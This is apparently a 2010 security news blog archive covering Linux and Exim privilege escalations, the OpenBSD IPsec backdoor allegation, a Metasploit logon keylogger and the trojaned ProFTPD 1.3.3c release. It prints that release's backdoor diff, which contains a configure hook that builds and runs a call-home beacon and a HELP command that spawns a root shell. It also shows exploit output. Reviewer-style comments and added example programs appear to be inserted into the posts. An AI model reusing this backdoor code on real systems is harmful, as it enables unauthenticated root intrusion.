Tuesday, December 21, 2010

Linux ACPI custom_method Privilege Escalation

On November 13th a fix was committed to the Linux kernel. For some reason I cannot understand, /sys/kernel/debug/acpi/custom_method was world writable, allowing any local user to load custom ACPI methods (AML) into the running interpreter's namespace. Since AML executes inside the kernel and can declare operation regions over arbitrary physical memory, that is a straight local root.

As the Red Hat bug report explains, the bug was introduced by this commit (Linux 2.6.33):

cm_dentry = debugfs_create_file("custom_method", S_IWUGO,
                    acpi_dir, NULL, &cm_fops);

S_IWUGO is a macro that grants write permission to the owner, the group and everybody else (mode 0222):

#define S_IWUGO         (S_IWUSR|S_IWGRP|S_IWOTH)

The fix changes the mode to S_IWUSR, the macro that grants write access to the owner (root) only.

An exploit already exists for this vulnerability. Note that the file is only present when the kernel was built with debugfs support and debugfs is mounted (normally on /sys/kernel/debug), so checking its mode bits is a quick way to tell whether a given box is exposed.

Wednesday, December 15, 2010

The OpenBSD IPSec stack is possibly backdoored

Yesterday, Theo de Raadt sent an e-mail to the OpenBSD mailing list disclosing the possible existence of a backdoor in the IPsec stack.

I have received a mail regarding the early development of the OpenBSD IPSEC stack. It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack, in particular the IPSEC stack. Around 2000-2001.
Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations is.

The forwarded e-mail is unbelievable...

Hello Theo,
Long time no talk. If you will recall, a while back I was the CTO at NETSEC and arranged funding and donations for the OpenBSD Crypto Framework. At that same time I also did some consulting for the FBI, for their GSA Technical Support Center, which was a cryptologic reverse engineering project aimed at backdooring and implementing key escrow mechanisms for smart card and other hardware-based computing technologies.

My NDA with the FBI has recently expired, and I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI. Jason Wright and several other developers were responsible for those backdoors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, they more than likely caught wind of the fact that those backdoors were present and didn't want to create any derivative products based upon the same.
This is also why several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments, for example Scott Lowe is a well respected author in virtualization circles who also happens to be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMware vSphere deployments.
Merry Christmas...  

Gregory Perry  
Chief Executive Officer 
GoVirtual Education

Tuesday, December 14, 2010

Snort coverage for the Exim remote root vulnerability

The Sourcefire VRT has published a blog post describing how Snort detects attempts to exploit the Exim root vulnerability.

Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely.

No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the max_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).
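To make the max_header_line_len point concrete, here is an added example (my own, not Snort's preprocessor code nor anything from the VRT post) of the per-line check that option expresses: walk the header section of a DATA payload up to the first empty line, measure each physical line, and alert when one exceeds the limit. The two sample messages are constructed for the demonstration; the 1000-byte default is the figure quoted by the VRT.

```c
/* Added example, not Snort's code: a minimal model of the SMTP
 * preprocessor's max_header_line_len check, run over constructed messages. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define SNORT_DEFAULT_MAX_HEADER_LINE_LEN 1000   /* default quoted by the VRT */

/* Length of the longest physical line in the header section of `msg`,
 * not counting the terminator (CRLF or a bare LF). Folded continuation
 * lines are measured on their own, as a per-line limit would. */
size_t longest_header_line(const char *msg)
{
    size_t longest = 0;
    const char *p = msg;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len && p[len - 1] == '\r')
            len--;                   /* drop the CR of a CRLF pair */
        if (len == 0)
            break;                   /* empty line: end of headers, body follows */
        if (len > longest)
            longest = len;
        if (!nl)
            break;
        p = nl + 1;
    }
    return longest;
}

/* 1 if some header line is longer than `limit`, i.e. the check would fire. */
int header_line_too_long(const char *msg, size_t limit)
{
    return longest_header_line(msg) > limit;
}

/* Constructed benign message: short headers, then a deliberately long body
 * line to show that the body is not subject to the header-line limit. */
const char *benign_message(void)
{
    return "From: a@example.org\r\n"
           "Subject: hi\r\n"
           "\r\n"
           "This body line is ignored by the check even though it is longer than any header line above.\r\n";
}

/* Constructed hostile message: one Subject: line padded with 'A' to exactly
 * `len` bytes, the kind of oversized header the alert is meant to catch.
 * Caller frees the result. */
char *hostile_message(size_t len)
{
    const char *prefix = "Subject: ";
    size_t plen = strlen(prefix);
    if (len < plen)
        len = plen;
    char *msg = malloc(len + 16);           /* line + CRLF CRLF "body" CRLF NUL */
    if (!msg)
        return NULL;
    memcpy(msg, prefix, plen);
    memset(msg + plen, 'A', len - plen);
    strcpy(msg + len, "\r\n\r\nbody\r\n");
    return msg;
}

/* Longest header line of a hostile message of the given size (or 0 on OOM). */
size_t hostile_longest(size_t len)
{
    char *m = hostile_message(len);
    if (!m)
        return 0;
    size_t r = longest_header_line(m);
    free(m);
    return r;
}

/* Verdict for a hostile message of `len` bytes against `limit`; -1 on OOM. */
int demo_hostile(size_t len, size_t limit)
{
    char *m = hostile_message(len);
    if (!m)
        return -1;
    int r = header_line_too_long(m, limit);
    free(m);
    return r;
}
```

Note the comparison is strictly greater-than: a line of exactly 1000 bytes passes with the default, which is why the VRT suggests anything up to 2000 still catches the published proof of concept, whose header lines are far longer than that.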

Monitoring the network with sFlow

Some resources to monitor networks with sFlow. Seen in geek00l's blog.

sFlow is a packet-sampling technology comparable to NetFlow that can be used to monitor network activity in real time.

Capturing Windows Logon Credentials with Metasploit

Great post from the Metasploit blog explaining how to use a keylogger to capture the Windows logon credentials.

Smartlocker is a Meterpreter script meant to capture the Windows credentials typed to unlock the session. It:

- Migrates into winlogon.exe
- Waits for the session to be locked (the session is idle)
- Starts the keylogger and keeps it running until the session is unlocked (the user types the username and password)
- Stops the keylogger
- Stores the captured credentials in a text file under /home/{user}/.msf3/logs/scripts/smartlocker/

Monday, December 13, 2010

Root vulnerability in Exim

Several websites comment on the root exploit for Exim that was published last week. In a nutshell, there is a memory corruption bug (a heap overflow) in the string_format() function that can be triggered through the headers of an e-mail message. The overflow itself only yields code execution as the Exim user; Kingcope's exploit then becomes root by abusing Exim's willingness to run with an alternate configuration file (-C) supplied by that user, so fixing string_format() alone does not close the root path.

What worries me is:
The flaw has been remedied in the Exim sources since version 4.70, released at the end of 2008. The correction was not, however, marked as relevant for security and therefore was not included in older versions. Debian's stable Lenny distribution still uses Exim 4.69, while Red Hat has 4.43.

Details from H-Security: initial report and fixes

Exim's bug report

Kingcope's exploit

Wednesday, December 8, 2010

Linux Kernel <= 2.6.37 local privilege escalation

A new local privilege escalation has been discovered in the Linux kernel, as reported on the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems
The Econet protocol (CVE-2010-3849) is not built at all in Red Hat-like distributions (RHEL, CentOS and Fedora), and the major distributions have already patched CVE-2010-3849 and CVE-2010-3850, so up-to-date systems should not be affected by this particular exploit.

CVE-2010-4258 is the main vulnerability and it is still unpatched. It is not exploitable on its own: when a process dies in an oops while the kernel is operating with the KERNEL_DS address limit, the exit path writes a zero to the process's clear_child_tid pointer without checking that it points into user space. That turns any bug that can produce such an oops into an arbitrary kernel write, and here the econet NULL dereference (CVE-2010-3849), reached thanks to the missing privilege check in econet_ioctl() (CVE-2010-3850), is that bug. Somebody could find another way to trigger it.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo
msk@ubuntu:~/exploit$ ./foo 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe08b72a0
 [+] Resolved econet_ops to 0xe08b73a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
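The "Affected systems" paragraph boils down to one question: will this kernel hand an unprivileged process an Econet socket at all? The program below is an added example of mine (not from the Full Disclosure post or the 15704.c exploit) that asks exactly that. socket() on an unsupported family returns EAFNOSUPPORT; on a distribution that ships econet.ko the same call autoloads the module (net-pf-19) even for an unprivileged caller, which is why "not loaded" is not the same as "not available". A socket coming back only proves the trigger path is reachable; whether CVE-2010-3849/3850 are patched is a separate matter.

```c
/* Added example, not the exploit's code: does this kernel let us open the
 * AF_ECONET socket that the public exploit needs as its entry point? */
#include <errno.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_ECONET
#define AF_ECONET 19   /* PF_ECONET in linux/socket.h */
#endif

/* Classify a socket() result: 1 = econet reachable, 0 = protocol family not
 * supported (not compiled in, and no module to autoload), -1 = some other
 * failure (e.g. EPERM from a sandbox), which says nothing either way. */
int classify_socket_result(int rc, int err)
{
    if (rc >= 0)
        return 1;
    if (err == EAFNOSUPPORT || err == EPROTONOSUPPORT || err == ESOCKTNOSUPPORT)
        return 0;
    return -1;
}

/* Try the actual call. Econet sockets are SOCK_DGRAM, as in the exploit. */
int econet_available(void)
{
    int fd = socket(AF_ECONET, SOCK_DGRAM, 0);
    int err = (fd < 0) ? errno : 0;
    int verdict = classify_socket_result(fd, err);
    if (fd >= 0)
        close(fd);
    return verdict;
}

const char *verdict_text(int verdict)
{
    switch (verdict) {
    case 1:  return "AF_ECONET socket opened: econet is reachable by unprivileged users";
    case 0:  return "EAFNOSUPPORT: econet not available, this exploit's trigger path is closed";
    default: return "socket() failed for another reason: inconclusive";
    }
}

int main(void)
{
    int v = econet_available();
    printf("%s\n", verdict_text(v));
    return v == 1 ? 1 : 0;   /* non-zero exit means "exposed", handy for scripting */
}
```

If it reports the socket opened, either patch the two econet CVEs or blacklist the module (and confirm the blacklist takes effect by running this again), since the autoload happens on the first socket() call from any user.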

Friday, December 3, 2010

Beyond Exploits: Real World Penetration Testing

This is one of the presentations that every IT manager or Chief Security Officer should watch.

People tend to build their security posture around vulnerabilities instead of around a sound design that protects their critical assets, and even penetration testers make the same mistake. Bad penetration testers, of course.

In my career in IT, I have seen many so-called penetration testers who just run vulnerability scanners and send the report to the customer. That is plainly wrong (rubbish?), because I do not need to pay a company to scan my own network for vulnerabilities; I can do it myself, with the same results.

So, what is a penetration test? It is meant to emulate a real attack, one that tries to reach our core business by making use of any possible attack vector.

A penetration tester must try all the possible attack vectors: misconfigurations, bad network designs, vulnerabilities, social engineering, protocol weaknesses, etc., because that is exactly what a skilled attacker, the motivated one who can cause real damage, will do.

H.D. Moore is the Chief Security Officer of Rapid7 and Founder & Chief Architect of Metasploit.

This presentation shows the techniques a skilled penetration tester can use to gain full access to a network without exploiting a single software vulnerability.

It covers: attacking the users, password testing, design weaknesses in the Windows platform (NTLM hashes and NTLM relay), abusing SMB design weaknesses to escalate privileges all the way up to the domain controller, layer 2 attacks, IPv6, etc.

Slides  Video

Thursday, December 2, 2010

ftp.proftpd.org compromised

The ProFTPD project has sent out a report informing users that its main distribution server was compromised.

On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.

UPDATE: I found a diff of the trojaned version against the clean 1.3.3c tarball:

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure       2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
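Review bot: configure must never compile and run code during M4sh initialization, yet the four inserted lines `gcc tests/tests.c -o tests/tests`, `tests/tests >/dev/null 2>&1 &` and `rm -rf tests/tests.c tests/tests` build a program, launch it in the background with all output discarded, and then delete both its source and binary, so nothing is left in the unpacked tree once configure has finished. A generated configure script is also never edited by hand, and there is no matching change to its autoconf input here, which on its own marks this as tampering rather than a build fix. Drop the four lines and regenerate configure; any host that ran this script should be treated as compromised, because whatever tests/tests did is already done by the time the build completes.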
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c      2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@

 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>

 struct help_rec {
   const char *cmd;
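Review bot: the new `#include <stdlib.h>` and `#include <string.h>` are not needed by anything in this hunk or by the existing code in help.c, which already calls strcasecmp() further down without them; their only consumers are the strcmp() and setuid()/setgid()/system() calls introduced later in the same file, so they should go together with that addition instead of remaining as an unexplained header change.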
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");

     } else {
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
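Review bot: the inserted `if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }` is a backdoor: HELP is accepted before authentication, so any client that sends `HELP ACIDBITCHEZ` gets a shell attached to the control connection, running as root (the telnet session below shows `id` returning uid=0). Nothing in HELP handling should ever change credentials or spawn a process; the only legitimate use of `target` in this block is the strcasecmp() lookup over help_list that follows. Delete the line, and treat the string ACIDBITCHEZ in FTP command logs or captures as an indicator of someone probing for this build.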
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c        2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+int sock;
+void handle_timeout(int sig)
+    close(sock);
+    exit(0);
+int main(void)
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+return 0; }
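Review bot: tests/tests.c is a call-home beacon rather than a test: it resolves `ip`, connects to TCP port 9090 (`DEF_PORT`), sends `GET /AB HTTP/1.0` and exits, with a 15-second SIGALRM handler so a filtered outbound connection cannot stall configure. As shown the file cannot even compile, since neither `handle_timeout()` nor `main()` has an opening brace, and with `char ip[20]=""` the gethostbyname("") call fails and main() returns -1 before connecting, so either the target address was scrubbed from this copy of the diff or lines were lost in the copy; `sprintf(ip, inet_ntoa(addr.sin_addr))` also passes a non-literal format string. The file should be removed outright together with the configure lines that build it, and an outbound connection to port 9090 carrying `GET /AB` from a build host is the indicator to search for in proxy and firewall logs.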

$ telnet 0 21
Connected to 0.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) []
214-The following commands are recognized (* =>'s unimplemented):
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
 NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
214 Direct comments to someone@somewhere
502 Unknown command 'ANOOP'
502 Unknown command 'A'

id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Using Volatility to perform memory forensics

The Volatility website points to a series of blog posts explaining how to use Volatility to perform memory forensics.

CSS History Hack

The CSS History Hack is an attack already explained by Jeremiah Grossman in 2006. In a nutshell, it is possible to use CSS and JavaScript to learn which pages our 'guest' has visited before. How? The web browser styles links to already-visited URLs differently (the :visited pseudo-class), and a script on the page can read that computed style back for any list of URLs it cares to test.

Forbes explains that some popular sites like YouPorn use this technique to learn which other porn sites the user has visited before.

How does it work? It’s based on your browser changing the color of links you’ve already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color “purple,” meaning you’ve clicked them before. YouPorn did not respond to an inquiry about why it collects this information, and tries to hide the practice by disguising the script with some easy-to-break cryptography.*

The porn site is not alone in its desire to know what other websites visitors have visited. A group of researchers from the University of California – San Diego trolled through the Web’s most popular sites to see which ones were collecting this information about visitors. They found it on 46 other news, finance, sports, and games sites, reporting their findings in a paper with the intimidating title, “An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications.”

The researchers who wrote the paper identifying this practice call it “history hijacking” or “history sniffing.” Mozilla, the foundation behind Web browser Firefox, calls it the “CSS: visited history bug.” It’s a bug that’s been discussed in developer circles for over a decade. Some browsers have fixed the bug. If you’re surfing using Chrome or Safari, this script doesn’t work. Firefox has fixed it in its newest version (for a long explanation as to how, see this post on the Mozilla security blog.) Internet Explorer, the most popular browser out there, is vulnerable to the history sniffing (though you can prevent it by going through the slightly onerous step of activating InPrivate Browsing, according to a spokesperson. That feature also blocks ad networks’ cookies, reports Business Insider.)

Quick introduction to SamuraiWTF

holisticinfosec describes the purpose of SamuraiWTF:

SamuraiWTF is a LiveCD Linux release designed to serve you for your web pen-testing needs. Kevin Johnson of Secure Ideas and Justin Searle of InGuardians included what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. SamuraiWTF includes tools useful in all four steps of a web pen-test:
Reconnaissance – Fierce domain scanner, Maltego (be sure to check out the Shodan Maltego add-on)
Mapping – WebScarab, ratproxy
Discovery – w3af and burp
Exploitation – BeEF, AJAXShell

Russ McRee points to his article in the December 2010 issue of the ISSA Journal, which gives a quick introduction to the tools available in SamuraiWTF.